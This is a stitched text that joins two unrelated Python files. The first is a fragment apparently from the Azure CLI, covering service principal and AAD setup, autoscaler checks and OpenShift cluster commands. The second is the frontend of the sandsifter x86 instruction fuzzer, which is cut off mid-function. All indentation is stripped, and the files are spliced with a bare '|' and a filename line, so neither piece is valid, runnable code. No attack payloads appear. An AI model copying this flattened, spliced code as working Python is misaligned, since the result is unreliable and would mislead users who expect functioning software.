logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# add role first before save it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal)
return load_acs_service_principal(subscription_id)
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, node_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("Current node count '{}' is not in the range of min-count and max-count.".format(node_count))
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
customer_admin_group_id=None):
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
# Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
# Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile])
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
# null out the AAD profile and add manually the masterAP name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _get_load_balancer_outbound_ips(load_balancer_outbound_ips):
"""parse load balancer profile outbound IP ids and return an array of references to the outbound IP resources"""
load_balancer_outbound_ip_resources = None
if load_balancer_outbound_ips:
load_balancer_outbound_ip_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ips.split(',')]
return load_balancer_outbound_ip_resources
def _get_load_balancer_outbound_ip_prefixes(load_balancer_outbound_ip_prefixes):
"""parse load balancer profile outbound IP prefix ids and return an array \
of references to the outbound IP prefix resources"""
load_balancer_outbound_ip_prefix_resources = None
if load_balancer_outbound_ip_prefixes:
load_balancer_outbound_ip_prefix_resources = \
[ResourceReference(id=x.strip()) for x in load_balancer_outbound_ip_prefixes.split(',')]
return load_balancer_outbound_ip_prefix_resources
def _get_load_balancer_profile(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes):
"""parse and build load balancer profile"""
load_balancer_outbound_ip_resources = _get_load_balancer_outbound_ips(load_balancer_outbound_ips)
load_balancer_outbound_ip_prefix_resources = _get_load_balancer_outbound_ip_prefixes(
load_balancer_outbound_ip_prefixes)
load_balancer_profile = None
if any([load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ip_resources,
load_balancer_outbound_ip_prefix_resources]):
load_balancer_profile = ManagedClusterLoadBalancerProfile()
if load_balancer_managed_outbound_ip_count:
load_balancer_profile.managed_outbound_ips = ManagedClusterLoadBalancerProfileManagedOutboundIPs(
count=load_balancer_managed_outbound_ip_count
)
if load_balancer_outbound_ip_resources:
load_balancer_profile.outbound_ips = ManagedClusterLoadBalancerProfileOutboundIPs(
public_ips=load_balancer_outbound_ip_resources
)
if load_balancer_outbound_ip_prefix_resources:
load_balancer_profile.outbound_ip_prefixes = ManagedClusterLoadBalancerProfileOutboundIPPrefixes(
public_ip_prefixes=load_balancer_outbound_ip_prefix_resources
)
return load_balancer_profile
|
sifter.py
|
#!/usr/bin/python
# instruction injector frontend
#
# github.com/xoreaxeaxeax/sandsifter // domas // @xoreaxeaxeax
#
# run as sudo for best results
import signal
import sys
import subprocess
import os
from struct import *
from capstone import *
from collections import namedtuple
from collections import deque
import threading
import time
import curses
from binascii import hexlify
import re
import random
import argparse
import code
import copy
from ctypes import *
INJECTOR = "./injector"
arch = ""
OUTPUT = "./data/"
LOG = OUTPUT + "log"
SYNC = OUTPUT + "sync"
TICK = OUTPUT + "tick"
LAST = OUTPUT + "last"
class ThreadState:
pause = False
run = True
class InjectorResults(Structure):
_fields_ = [('disas_length', c_int),
('disas_known', c_int),
('raw_insn', c_ubyte * 16),
('valid', c_int),
('length', c_int),
('signum', c_int),
('sicode', c_int),
('siaddr', c_int),
]
class Settings:
SYNTH_MODE_RANDOM = "r"
SYNTH_MODE_BRUTE = "b"
SYNTH_MODE_TUNNEL = "t"
synth_mode = SYNTH_MODE_RANDOM
root = False
seed = 0
args = ""
def __init__(self, args):
if "-r" in args:
self.synth_mode = self.SYNTH_MODE_RANDOM
elif "-b" in args:
self.synth_mode = self.SYNTH_MODE_BRUTE
elif "-t" in args:
self.synth_mode = self.SYNTH_MODE_TUNNEL
self.args = args
self.root = (os.geteuid() == 0)
self.seed = random.getrandbits(32)
def increment_synth_mode(self):
if self.synth_mode == self.SYNTH_MODE_BRUTE:
self.synth_mode = self.SYNTH_MODE_RANDOM
elif self.synth_mode == self.SYNTH_MODE_RANDOM:
self.synth_mode = self.SYNTH_MODE_TUNNEL
elif self.synth_mode == self.SYNTH_MODE_TUNNEL:
self.synth_mode = self.SYNTH_MODE_BRUTE
class Tests:
r = InjectorResults() # current result
IL=20 # instruction log len
UL=10 # artifact log len
il = deque(maxlen=IL) # instruction log
al = deque(maxlen=UL) # artifact log
ad = dict() # artifact dict
ic = 0 # instruction count
ac = 0 # artifact count
start_time = time.time()
def elapsed(self):
m, s = divmod(time.time() - self.start_time, 60)
h, m = divmod(m, 60)
return "%02d:%02d:%02d.%02d" % (h, m, int(s), int(100*(s-int(s))) )
class Tee(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
sys.stdout = self
def __del__(self):
sys.stdout = self.stdout
self.file.close()
def write(self, data):
self.file.write(data)
self.stdout.write(data)
# capstone disassembler
md = None
def disas_capstone(b):
global md, arch
if not md:
if arch == "64":
md = Cs(CS_ARCH_X86, CS_MODE_64)
else:
md = Cs(CS_ARCH_X86, CS_MODE_32)
try:
(address, size, mnemonic, op_str) = md.disasm_lite(b, 0, 1).next()
except StopIteration:
mnemonic="(unk)"
op_str=""
size = 0
return (mnemonic, op_str, size)
# ndisasm disassembler
# (ndidsasm breaks unnecessary prefixes onto its own line, which makes parsing
# the output difficult. really only useful with the -P0 flag to disallow
# prefixes)
def disas_ndisasm(b):
b = ''.join('\\x%02x' % ord(c) for c in b)
if arch == "64":
dis, errors = subprocess.Popen("echo -ne '%s' | ndisasm -b64 - | head -2" % b,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
else:
dis, errors = subprocess.Popen("echo -ne '%s' | ndisasm -b32 - | head -2" % b,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
dis = dis.split("\n")
extra = dis[1]
dis = dis[0].split(None, 4)
if extra.strip()[0] == '-':
dis[1] = dis[1] + extra.strip()[1:]
address = dis[0]
insn = dis[1]
mnemonic = dis[2]
if len(dis) > 3:
op_str = dis[3]
else:
op_str = ""
if mnemonic == "db":
mnemonic = "(unk)"
insn = ""
op_str = ""
size = len(insn)/2
return (mnemonic, op_str, size)
# objdump disassembler
# (objdump breaks unnecessary prefixes onto its own line, which makes parsing
# the output difficult. really only useful with the -P0 flag to disallow
# prefixes)
def disas_objdump(b):
with open("/dev/shm/shifter", "w") as f:
f.write(b)
if arch == "64":
dis, errors = subprocess.Popen("objdump -D --insn-width=256 -b binary \
-mi386 -Mx86-64 /dev/shm/shifter | head -8 | tail -1",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
else:
dis, errors = subprocess.Popen("objdump -D --insn-width=256 -b binary \
-mi386 /dev/shm/shifter | head -8 | tail -1",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).communicate()
dis = dis[6:] # address
raw = dis[:256*3].replace(" ","")
dis = dis[256*3:].strip().split(None, 2)
mnemonic = dis[0]
if len(dis) > 1:
op_str = dis[1]
else:
op_str = ""
if mnemonic == "(bad)":
mnemonic = "(unk)"
insn = ""
op_str = ""
size = len(raw)/2
return (mnemonic, op_str, size)
def cstr2py(s):
return ''.join([chr(x) for x in s])
# targeting python 2.6 support
def int_to_comma(x):
if type(x) not in [type(0), type(0)]:
raise TypeError("Parameter must be an integer.")
if x < 0:
return '-' + int_to_comma(-x)
result = ''
while x >= 1000:
x, r = divmod(x, 1000)
result = ",%03d%s" % (r, result)
return "%d%s" % (x, result)
def result_string(insn, result):
s = "%30s %2d %2d %2d %2d (%s)\n" % (
hexlify(insn), result.valid,
result.length, result.signum,
result.sicode, hexlify(cstr2py(result.raw_insn)))
return s
class Injector:
process = None
settings = None
command = None
def __init__(self, settings):
self.settings = settings
def start(self):
self.command = "%s %s -%c -R %s -s %d" % \
(
INJECTOR,
" ".join(self.settings.args),
self.settings.synth_mode,
"-0" if self.settings.root else "",
self.settings.seed
)
self.process = subprocess.Popen(
"exec %s" % self.command,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
preexec_fn=os.setsid
)
def stop(self):
if self.process:
try:
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
except OSError:
pass
class Poll:
SIGILL = 4
SIGSEGV = 11
SIGFPE = 8
SIGBUS = 7
SIGTRAP = 5
def __init__(self, ts, injector, tests, command_line, sync=False, low_mem=False, search_unk=True,
search_len=False, search_dis=False, search_ill=False, disassembler=disas_capstone):
self.ts = ts
self.injector = injector
self.T = tests
self.poll_thread = None
self.sync = sync
self.low_mem = low_mem
self.search_len = search_len
self.search_unk = search_unk
self.search_dis = search_dis
self.search_ill = search_ill
self.disas = disassembler
if self.sync:
with open(SYNC, "w") as f:
f.write("#\n")
f.write("# %s\n" % command_line)
f.write("# %s\n" % injector.command)
f.write("#\n")
f.write("# cpu:\n")
cpu = get_cpu_info()
for l in cpu:
f.write("# %s\n" % l)
f.write("# %s v l s c\n" % (" " * 28))
def start(self):
self.poll_thread = threading.Thread(target=self.poll)
self.poll_thread.start()
def stop(self):
self.poll_thread.join()
while self.ts.run:
time.sleep(.1)
def poll(self):
while self.ts.run:
while self.ts.pause:
time.sleep(.1)
bytes_polled = self.injector.process.stdout.readinto(self.T.r)
if bytes_polled == sizeof(self.T.r):
self.T.ic = self.T.ic + 1
error = False
if self.T.r.valid:
if self.search_unk and not self.T.r.disas_known and self.T.r.signum != self.SIGILL:
error = True
if self.search_len and self.T.r.disas_known and self.T.r.disas_length != self.T.r.length:
error = True
if self.search_dis and self.T.r.disas_known \
and self.T.r.disas_length != self.T.r.length and self.T.r.signum != self.SIGILL:
error = True
if self.search_ill and self.T.r.disas_known and self.T.r.signum == self.SIGILL:
error = True
if error:
insn = cstr2py(self.T.r.raw_insn)[:self.T.r.length]
r = copy.deepcopy(self.T.r)
self.T.al.appendleft(r)
if insn not in self.T.ad:
if not self.low_mem:
self.T.ad[insn] = r
self.T.ac = self.T.ac + 1
if self.sync:
with open(SYNC, "a") as f:
f.write(result_string(insn, self.T.r))
else:
if self.injector.process.poll() is not None:
self.ts.run = False
break
class Gui:
TIME_SLICE = .01
GRAY_BASE = 50
TICK_MASK = 0xff
RATE_Q = 100
RATE_FACTOR = 1000
INDENT = 10
GRAYS = 50
BLACK = 1
WHITE = 2
BLUE = 3
RED = 4
GREEN = 5
COLOR_BLACK = 16
COLOR_WHITE = 17
COLOR_BLUE = 18
COLOR_RED = 19
COLOR_GREEN = 20
def __init__(self, ts, injector, tests, do_tick, disassembler=disas_capstone):
self.ts = ts;
self.injector = injector
self.T = tests
self.gui_thread = None
self.do_tick = do_tick
self.ticks = 0
self.last_ins_count = 0
self.delta_log = deque(maxlen=self.RATE_Q)
self.time_log = deque(maxlen=self.RATE_Q)
self.disas = disassembler
self.stdscr = curses.initscr()
curses.start_color()
# doesn't work
# self.orig_colors = [curses.color_content(x) for x in xrange(256)]
curses.use_default_colors()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self.stdscr.nodelay(1)
self.sx = 0
self.sy = 0
self.init_colors()
self.stdscr.bkgd(curses.color_pair(self.WHITE))
self.last_time = time.time()
def init_colors(self):
if curses.has_colors() and curses.can_change_color():
curses.init_color(self.COLOR_BLACK, 0, 0, 0)
curses.init_color(self.COLOR_WHITE, 1000, 1000, 1000)
curses.init_color(self.COLOR_BLUE, 0, 0, 1000)
curses.init_color(self.COLOR_RED, 1000, 0, 0)
curses.init_color(self.COLOR_GREEN, 0, 1000, 0)
# this will remove flicker, but gives boring colors
'''
self.COLOR_BLACK = curses.COLOR_BLACK
self.COLOR_WHITE = curses.COLOR_WHITE
self.COLOR_BLUE = curses.COLOR_BLUE
self.COLOR_RED = curses.COLOR_RED
self.COLOR_GREEN = curses.COLOR_GREEN
'''
for i in xrange(0, self.GRAYS):
curses.init_color(
self.GRAY_BASE + i,
i * 1000 / (self.GRAYS - 1),
i * 1000 / (self.GRAYS - 1),
i * 1000 / (self.GRAYS - 1)
)
curses.init_pair(
self.GRAY_BASE + i,
self.GRAY_BASE + i,
self.COLOR_BLACK
)
else:
self.COLOR_BLACK = curses.COLOR_BLACK
self.COLOR_WHITE = curses.COLOR_WHITE
self.COLOR_BLUE = curses.COLOR_BLUE
self.COLOR_RED = curses.COLOR_RED
self.COLOR_GREEN = curses.COLOR_GREEN
for i in xrange(0, self.GRAYS):
curses.init_pair(
self.GRAY_BASE + i,
self.COLOR_WHITE,
self.COLOR_BLACK
)
curses.init_pair(self.BLACK, self.COLOR_BLACK, self.COLOR_BLACK)
curses.init_pair(self.WHITE, self.COLOR_WHITE, self.COLOR_BLACK)
curses.init_pair(self.BLUE, self.COLOR_BLUE, self.COLOR_BLACK)
curses.init_pair(self.RED, self.COLOR_RED, self.COLOR_BLACK)
curses.init_pair(self.GREEN, self.COLOR_GREEN, self.COLOR_BLACK)
def gray(self, scale):
if curses.can_change_color():
return curses.color_pair(self.GRAY_BASE + int(round(scale * (self.GRAYS - 1))))
else:
return curses.color_pair(self.WHITE)
def box(self, window, x, y, w, h, color):
for i in xrange(1, w - 1):
window.addch(y, x + i, curses.ACS_HLINE, color)
window.addch(y + h - 1, x + i, curses.ACS_HLINE, color)
for i in xrange(1, h - 1):
window.addch(y + i, x, curses.ACS_VLINE, color)
window.addch(y + i, x + w - 1, curses.ACS_VLINE, color)
window.addch(y, x, curses.ACS_ULCORNER, color)
window.addch(y, x + w - 1, curses.ACS_URCORNER, color)
window.addch(y + h - 1, x, curses.ACS_LLCORNER, color)
window.addch(y + h - 1, x + w - 1, curses.ACS_LRCORNER, color)
def bracket(self, window, x, y, h, color):
for i in xrange(1, h - 1):
window.addch(y + i, x, curses.ACS_VLINE, color)
window.addch(y, x, curses.ACS_ULCORNER, color)
window.addch(y + h - 1, x, curses.ACS_LLCORNER, color)
def vaddstr(self, window, x, y, s, color):
for i in xrange(0, len(s)):
window.addch(y + i, x, s[i], color)
def draw(self):
try:
self.stdscr.erase()
# constants
left = self.sx + self.INDENT
top = self.sy
top_bracket_height = self.T.IL
top_bracket_middle = self.T.IL / 2
mne_width = 10
op_width = 45
raw_width = (16*2)
# render log bracket
self.bracket(self.stdscr, left - 1, top, top_bracket_height + 2, self.gray(1))
# render logo
self.vaddstr(self.stdscr, left - 3, top + top_bracket_middle - 5, "sand", self.gray(.2))
self.vaddstr(self.stdscr, left - 3, top + top_bracket_middle + 5, "sifter", self.gray(.2))
# refresh instruction log
synth_insn = cstr2py(self.T.r.raw_insn)
(mnemonic, op_str, size) = self.disas(synth_insn)
self.T.il.append(
(
mnemonic,
op_str,
self.T.r.length,
"%s" % hexlify(synth_insn)
)
)
# render instruction log
try:
for (i, r) in enumerate(self.T.il):
line = i + self.T.IL - len(self.T.il)
(mnemonic, op_str, length, raw) = r
if i == len(self.T.il) - 1:
# latest instruction
# mnemonic
self.stdscr.addstr(
top + 1 + line,
left,
"%*s " % (mne_width, mnemonic),
self.gray(1)
)
# operands
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1),
"%-*s " % (op_width, op_str),
curses.color_pair(self.BLUE)
)
# bytes
if self.maxx > left + (mne_width + 1) + (op_width + 1) + (raw_width + 1):
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1) + (op_width + 1),
"%s" % raw[0:length * 2],
self.gray(.9)
)
self.stdscr.addstr(
top + 1 +line,
left + (mne_width + 1) + (op_width + 1) + length * 2,
"%s" % raw[length * 2:raw_width],
self.gray(.3)
)
else:
# previous instructions
# mnemonic, operands
self.stdscr.addstr(
top + 1 + line,
left,
"%*s %-*s" % (mne_width, mnemonic, op_width, op_str),
self.gray(.5)
)
# bytes
if self.maxx > left + (mne_width + 1) + (op_width + 1) + (raw_width + 1):
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1) + (op_width + 1),
"%s" % raw[0:length * 2],
self.gray(.3)
)
self.stdscr.addstr(
top + 1 + line,
left + (mne_width + 1) + (op_width + 1) + length * 2,
"%s" % raw[length * 2:raw_width],
self.gray(.1)
)
except RuntimeError:
# probably the deque was modified by the poller
pass
# rate calculation
self.delta_log.append(self.T.ic - self.last_ins_count)
self.last_ins_count = self.T.ic
ctime = time.time()
self.time_log.append(ctime - self.last_time)
self.last_time = ctime
rate = int(sum(self.delta_log)/sum(self.time_log))
# render timestamp
if self.maxx > left + (mne_width + 1) + (op_width + 1) + (raw_width + 1):
self.vaddstr(
self.stdscr,
left + (mne_width + 1) + (op_width + 1) + (raw_width + 1),
top + 1,
self.T.elapsed(),
self.gray(.5)
)
# render injection settings
self.stdscr.addstr(top + 1, left - 8, "%d" % self.injector.settings.root, self.gray(.1))
self.stdscr.addstr(top + 1, left - 7, "%s" % arch, self.gray(.1))
self.stdscr.addstr(top + 1, left - 3, "%c" % self.injector.settings.synth_mode, self.gray(.5))
# render injection results
self.stdscr.addstr(top + top_bracket_middle, left - 6, "v:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle, left - 4, "%2x" % self.T.r.valid)
self.stdscr.addstr(top + top_bracket_middle + 1, left - 6, "l:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle + 1, left - 4, "%2x" % self.T.r.length)
self.stdscr.addstr(top + top_bracket_middle + 2, left - 6, "s:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle + 2, left - 4, "%2x" % self.T.r.signum)
self.stdscr.addstr(top + top_bracket_middle + 3, left - 6, "c:", self.gray(.5))
self.stdscr.addstr(top + top_bracket_middle + 3, left - 4, "%2x" % self.T.r.sicode)
# render instruction count
self.stdscr.addstr(top + top_bracket_height + 2, left, "#", self.gray(.5))
self.stdscr.addstr(top + top_bracket_height + 2, left + 2,
"%s" % (int_to_comma(self.T.ic)), self.gray(1))
# render rate
self.stdscr.addstr(top + top_bracket_height + 3, left,
" %d/s%s" % (rate, " " * min(rate / self.RATE_FACTOR, 100)), curses.A_REVERSE)
# render artifact count
self.stdscr.addstr(top + top_bracket_height + 4, left, "#", self.gray(.5))
self.stdscr.addstr(top + top_bracket_height + 4, left + 2,
"%s" % (int_to_comma(self.T.ac)), curses.color_pair(self.RED))
# render artifact log
if self.maxy >= top + top_bracket_height + 5 + self.T.UL + 2:
# render artifact bracket
self.bracket(self.stdscr, left - 1, top + top_bracket_height + 5, self.T.UL + 2, self.gray(1))
# render artifacts
try:
for (i, r) in enumerate(self.T.al):
y = top_bracket_height + 5 + i
insn_hex = hexlify(cstr2py(r.raw_insn))
# unexplainable hack to remove some of the unexplainable
# flicker on my console. a bug in ncurses? doesn't
# happen if using curses.COLOR_RED instead of a custom
# red. doesn't happen if using a new random string each
# time; doesn't happen if using a constant string each
# time. only happens with the specific implementation below.
#TODO: on systems with limited color settings, this
# makes the background look like random characters
random_string = ("%02x" % random.randint(0,100)) * (raw_width-2)
self.stdscr.addstr(top + 1 + y, left, random_string, curses.color_pair(self.BLACK))
self.stdscr.addstr(top + 1 + y, left + 1,
"%s" % insn_hex[0:r.length * 2], curses.color_pair(self.RED))
self.stdscr.addstr(top + 1 + y, left + 1 + r.length * 2,
"%s" % insn_hex[r.length * 2:raw_width], self.gray(.25))
except RuntimeError:
# probably the deque was modified by the poller
pass
self.stdscr.refresh()
except curses.error:
pass
def start(self):
self.gui_thread = threading.Thread(target=self.render)
self.gui_thread.start()
def stop(self):
self.gui_thread.join()
def checkkey(self):
c = self.stdscr.getch()
if c == ord('p'):
self.ts.pause = not self.ts.pause
elif c == ord('q'):
self.ts.run = False
elif c == ord('m'):
self.ts.pause = True
time.sleep(.1)
self.injector.stop()
self.injector.settings.increment_synth_mode()
self.injector.start()
self.ts.pause = False
def render(self):
while self.ts.run:
while self.ts.pause:
self.checkkey()
time.sleep(.1)
(self.maxy,self.maxx) = self.stdscr.getmaxyx()
self.sx = 1
self.sy = max((self.maxy + 1 - (self.T.IL + self.T.UL + 5 + 2))/2, 0)
self.checkkey()
synth_insn = cstr2py(self.T.r.raw_insn)
if synth_insn and not self.ts.pause:
self.draw()
if self.do_tick:
